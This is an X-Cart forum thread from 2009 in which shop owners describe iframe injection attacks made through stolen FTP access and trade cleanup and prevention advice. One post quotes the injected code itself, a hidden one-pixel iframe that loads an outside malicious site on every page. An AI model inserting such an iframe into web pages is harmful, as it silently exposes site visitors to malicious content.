X-Cart: shopping cart software

X-Cart forums (https://forum.x-cart.com/index.php)
-   News and Announcements (https://forum.x-cart.com/forumdisplay.php?f=28)
-   -   Warning: Iframe based attacks using stolen FTP access info (https://forum.x-cart.com/showthread.php?t=43161)

bigredseo 02-22-2009 08:55 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
We haven't had an iFrame incident since this issue back in December. Was everything secured and updated on the server levels? Have you scanned the server and contacted those users that were infected and told them to update their software?

shellshack 02-24-2009 06:16 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
I am somewhat hesitant to say my problem is solved but my hacker hasn't been back in a couple of months. I believe my hacker was gaining access through my shared server. I moved to hands-on and so far so good. Blue+cheap=hacked?

samz724 05-18-2009 09:59 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Sorry to break the "silence" but our site was hacked (iframe) on 05/12/2009!

I have cleaned/replaced the index.php files, home.php files, etc. that have the line of code in them..

However, if you go into any page of the site (including admin pages) and click to view the source code.. the iframe link still exists

<p /><iframe src="http://brugeni.net/?click=313114" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>



I've read through this entire thread and if any one have any idea what's causing this? Please let me know. Thanks for your help! :?

balinor 05-18-2009 10:06 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
That means there is an iframe still in your code somewhere - you need to look through ALL of your files, as there are quite a number that are usually injected. Your host can help with this, as they have tools to scan your entire site quickly.

samz724 05-18-2009 10:10 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Thanks for the reply. I have Hands-on doing a scan.. we'll see what the results are

Any thoughts on how to prevent another attack?

Thanks

gb2world 05-18-2009 10:14 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Also clear your browser cache and run cleanup.php - you may be looking at files complied before you cleaned up.
Hands-on was very responsive when I got hit with this - so it is good you are there. They also helped me to correctly set up ftps, just in case insecure ftp has something to do with this attack.

gb2world 05-18-2009 10:18 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Quote:

Any thoughts on how to prevent another attack?

read this

BCSE 05-18-2009 12:10 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Also, I have seen Iframe attacks be encoded in HEX. So you may not be able to look for "iframe" per say in the templates.

It could be a bunch of Hex equivalent characters.

Good luck!

Thanks,

Carrie

bigredseo 05-25-2009 06:42 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
In recent days we've been seeing the HEX add too.. instaed of a regular iframe injection, there's document.write being used in the script portion and everything in there is encoded.

Makes it a little harder to SEE what's an issue, but the injections still appear to be going at the bottom of files, so they're still easy enough to spot.

TA 05-25-2009 07:10 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Are these recent attacks still going through FTP with the correct username and password?


All times are GMT -8. The time now is 08:24 AM.

Powered by vBulletin Version 3.5.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.